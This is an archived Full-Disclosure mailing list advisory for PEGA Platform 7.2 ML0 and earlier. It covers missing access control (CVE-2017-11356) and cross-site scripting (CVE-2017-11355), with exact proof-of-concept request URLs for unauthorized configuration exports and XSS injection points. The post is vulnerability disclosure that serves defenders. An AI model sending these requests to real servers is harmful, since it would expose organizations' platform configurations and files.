lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADgRKGw9d9WwdZej5HD44ON7vL8mX3tt0+r=Mr+677=nK4-nwQ@mail.gmail.com>
Date: Mon, 17 Jul 2017 09:41:15 -0500
From: Daniel Correa <admin@...focol.org>
To: fulldisclosure@...lists.org
Subject: [FD] PEGA Platform <= 7.2 ML0 - Multiple vulnerabilities

Summary
=======
1. Missing access control (CVE-2017-11356)
2. Multiple cross-site scripting (CVE-2017-11355)


Vendor
======
"Pegasystems Inc. is the leader in software for customer engagement and
operational excellence. Pega’s adaptive, cloud-architected software – built
on its unified Pega® Platform – empowers people to rapidly deploy, and
easily extend and change applications to meet strategic business needs.
Over its 30-year history, Pega has delivered award-winning capabilities in
CRM and BPM, powered by advanced artificial intelligence and robotic
automation, to help the world’s leading brands achieve breakthrough
business results."

https://www.pega.com/about


Tested version
==============
PEGA Platform <= 7.2 ML0


Vulnerabilities and PoC
=======================
1. Missing access control on the application distribution export
functionality (CVE-2017-11356)

Low privileged users can directly access the administrator resources to
download a full compressed file with configurations and files of the
platform, a 300MB compressed file was downloaded in a production
environment.

Affected components could be found on the PEGA Designer Studio through the
"Application > Distribution > Export" path.

To exploit this vulnerability the following requests must be made:

1.1 Export Mode: By application
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Application.pzLPPerformAppExport&ApplicationName=APPNAME&ApplicationVersion=VERSION
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/APPNAME_VERSION_DATE_GMT.zip

1.2 Export Mode: By RuleSet/Version
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-RuleSet-Version.PegaRULESMove_RunBatchReq&pyZipFileName=configurations.zip&pyRuleSet=APPNAME&pyRuleSetVersion=VERSION&pyAppContext=&PageName=pyZipMoveRuleSets
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip

1.3 Export Mode: By Product
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Admin-Product.RunBatchReq&ZipFileName=configurations.zip&ProductKey=RULE-ADMIN-PRODUCT%20APPNAME%20DATE%20GMT
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip

1.4 Archive On Server
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=@baseclass.DownloadFile&FileName=FILENAME


2. Multiple cross-site scripting (CVE-2017-11355)

2.1 Main page

https://PEGASERVER/prweb/RANDOMTOKEN/![XSS]

2.2 JavaBean viewer

https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-IS-.JavaBeanViewer&beanReference=[XSS]

2.3 System database schema modification

https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-DB-Table.DBSchema_ListClassesInTable
POST:
pzFromFrame=&pzUseThread=&pzTransactionId=&pzPrimaryPageName=pyDbSchemaTablesList&pyDatabaseName=PegaDATA&pyTableName=[XSS]


Variables
=========
PEGASERVER: IP/domain of the platform installation.
RANDOMTOKEN: random token generated per installation, it is random but
known to the user.
APPNAME: name of the application.
VERSION: application version.
FILENAME: physical filename of the backup.
DATE: current date of the request.


Timeline
========
01/06/2017: Vendor is notified through support and security email
07/06/2017: CERT/CC contacted, vulnerabilities are not coordinated
17/07/2017: No response from vendor, CVE assigned, full disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ